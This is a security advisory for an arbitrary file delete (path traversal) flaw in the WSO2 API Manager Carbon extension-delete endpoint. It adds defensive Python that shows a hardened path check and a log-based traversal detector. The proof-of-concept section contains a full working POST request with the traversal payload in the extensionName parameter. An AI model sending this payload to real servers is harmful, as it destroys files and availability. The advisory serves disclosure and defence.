# Title: WSO2 3.1.0 - Arbitrary File Delete
# Date: 2020-04-12
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A

Document Title:
===============
WSO2 API Manager (Delete Extension) Arbitrary File Delete (Path Traversal)

## CVE: not assigned yet
## Security Update: https://apim.docs.wso2.com/en/latest/

Common Vulnerability Scoring System:
====================================
8.5

Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product.
The vulnerability allows a remote attacker with a low-privileged account to send authenticated application requests
and delete arbitrary files on the system.

The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` module, in the `extensionName` parameter
that names the extension to delete. Remote attackers are able to delete arbitrary files, such as configuration files or database (.db) files,
via authenticated POST requests that carry a crafted path traversal string in `extensionName`.

The security risk of the arbitrary file delete vulnerability is estimated as High, with a CVSS (Common Vulnerability Scoring System) score of 8.5.
Exploitation of the path traversal vulnerability requires a low-privileged web-application user account and no user interaction.
Successful exploitation results in loss of availability, integrity and confidentiality.

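The root cause described above is a user-controlled name being joined to the extensions directory with no containment check. The following is an added example (not WSO2's code and not part of the advisory) showing the flawed join next to a hardened lookup that applies two independent layers: a syntactic allow-list for the extension name and a post-normalisation containment check. The directory path `EXTENSIONS_DIR` is a constructed Linux stand-in for the `repository\deployment\server\registryextensions` directory the advisory's log shows on Windows; the `.jar`-only allow-list is an assumption based on the PoC uploading a `.jar` file.

```python
import os
import re

# Constructed stand-in for WSO2's extensions directory; the advisory shows it as
# <CARBON_HOME>\repository\deployment\server\registryextensions on Windows.
EXTENSIONS_DIR = "/opt/carbon/repository/deployment/server/registryextensions"

# Allow-list for an extension name (assumption): a single path component, no
# leading dot, ending in .jar. No separators are accepted, so "..", "/" and "\"
# never reach the filesystem layer at all.
_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]*\.jar")


def unsafe_target(extension_name, base=EXTENSIONS_DIR):
    """The flawed pattern the advisory describes: the user-supplied name is
    joined to the extensions directory and passed on without any containment
    check, so '..' components walk out of the directory."""
    return os.path.normpath(os.path.join(base, extension_name))


def is_contained(extension_name, base=EXTENSIONS_DIR):
    """Containment check on its own: True if base/extension_name, after
    normalisation, still lies inside base."""
    base_abs = os.path.abspath(base)
    candidate = os.path.normpath(os.path.join(base_abs, extension_name))
    # commonpath() compares whole components, so a sibling directory such as
    # ".../registryextensions2" is not mistaken for the base the way a plain
    # startswith() check would be. An absolute extension_name makes join()
    # discard base entirely, which this check also catches.
    return os.path.commonpath([base_abs, candidate]) == base_abs


def safe_target(extension_name, base=EXTENSIONS_DIR):
    """Hardened lookup: returns the absolute path of the extension inside
    `base`, or raises ValueError. The allow-list rejects traversal strings
    outright; the containment check remains as a second line of defence in
    case the allow-list is ever loosened."""
    if not _NAME_RE.fullmatch(extension_name):
        raise ValueError(f"invalid extension name: {extension_name!r}")
    if not is_contained(extension_name, base):
        raise ValueError(f"extension name escapes {base}: {extension_name!r}")
    return os.path.normpath(os.path.join(os.path.abspath(base), extension_name))


def rejects(extension_name, base=EXTENSIONS_DIR):
    """True if safe_target() refuses the given name."""
    try:
        safe_target(extension_name, base)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "../../../../INSTALL.txt"   # the advisory's PoC value
    print("unsafe join resolves to:   ", unsafe_target(payload))
    print("hardened lookup rejects it:", rejects(payload))
    print("legitimate name resolves to:", safe_target("commons-dir.jar"))
```

Run stand-alone, the script shows the advisory's payload resolving four directories up from the extensions directory (to `INSTALL.txt` under the installation root) through the unsafe join, and being refused by the hardened lookup. On a POSIX host a name such as `..\..\INSTALL.txt` is a single odd filename rather than a traversal; the allow-list rejects it anyway, which is why the syntactic layer should not be dropped in favour of the containment check alone.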
===============================

Error generated by the server when the file is not found, from the 'logfile' (this brought my attention ...):

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir
    at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.java:531) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisOperation.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.removeExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.extensions.stub_4.7.13.jar:?]
    at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extensions.ui_4.7.13.jar:?]
    at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspService(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
    at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [tomcat_9.0.22.wso2v1.jar:?]

* Error displayed in the web browser, in the response body:

<script type="text/javascript">
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>

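The log entry above is useful telemetry for defenders: the `ResourceServiceClient` fault echoes the full path that was attempted, including the user-supplied `extensionName`. The following is an added example (not part of the advisory and not WSO2 code) that scans such log lines and flags entries whose supplied component climbs out of the `registryextensions` directory. The sample lines are constructed and modelled on the advisory's log; the Linux-style path and the later timestamps are invented. Note that the base path WSO2 logs already contains a benign `bin\..`, so a plain grep for `..` would fire on every entry; the detector therefore anchors on the `registryextensions` component and only evaluates what follows it. One caveat the page itself implies: this error appears when the named file does not exist, so this catches failed or probing attempts; a successful deletion would need other telemetry.

```python
import re

# Constructed sample log, modelled on the advisory's Carbon log output.
# Entry 1 is a benign failed delete, entries 2 and 3 carry traversal strings.
SAMPLE_LOG = r"""
[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir
[2020-01-04 01:52:10,004] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\../../../../INSTALL.txt
[2020-01-04 01:55:38,120] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: /opt/wso2am/repository/deployment/server/registryextensions/../../conf/nofile.txt
[2020-01-04 01:58:01,440] INFO - Unrelated message with no path in it
""".strip()

HEADER_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] ERROR - ResourceServiceClient Failed to remove extension"
)
FAULT_RE = re.compile(r"File does not exist: (?P<path>.+?)\s*$")
BASE_MARKER = "registryextensions"   # directory the extension name is joined to


def naive_flag(line):
    """A plain '..' grep. Fires on the benign entry too, because the base path
    WSO2 logs already contains 'bin\\..', which is why it is not good enough."""
    return ".." in line


def supplied_components(path):
    """Return the path components after the last 'registryextensions'
    component, i.e. the part that came from the extensionName parameter.
    Handles both Windows and POSIX separators, since the log mixes them."""
    parts = re.split(r"[\\/]", path)
    if BASE_MARKER not in parts:
        return None
    idx = len(parts) - 1 - parts[::-1].index(BASE_MARKER)
    return parts[idx + 1:]


def escapes_base(components):
    """True if walking the components ever rises above the base directory.
    'a/../b.jar' stays inside; '../x' and 'a/../../x' do not."""
    depth = 0
    for c in components:
        if c in ("", "."):
            continue
        if c == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def find_traversal_attempts(log_text):
    """Scan log text; return (timestamp, supplied_name) for each failed
    extension delete whose supplied name escapes the extensions directory."""
    findings = []
    last_ts = None
    for line in log_text.splitlines():
        header = HEADER_RE.match(line)
        if header:
            last_ts = header.group("ts")
            continue
        fault = FAULT_RE.search(line)
        if not fault:
            continue
        comps = supplied_components(fault.group("path"))
        if comps is not None and escapes_base(comps):
            findings.append((last_ts, "/".join(comps)))
    return findings


if __name__ == "__main__":
    for ts, name in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ts}  traversal in extensionName: {name}")
```

Run stand-alone, the script reports the two constructed traversal entries and stays silent on the benign `commons-dir` failure. Pairing each finding with the preceding header line gives the timestamp, which can then be correlated with the session in the Carbon access logs for the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` endpoint.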
=============================

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName

Server version:
3.0.0

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with a low-privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps below.

1- The attacker must have access to the Extension component (List, Add, Delete extensions).
2- The attacker uploads any file with the .jar extension.
3- The attacker intercepts the request that follows and modifies the parameter with a traversal string:

--- PoC Session Logs [POST] ---

POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

---------------Returned Headers in Response------------------

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server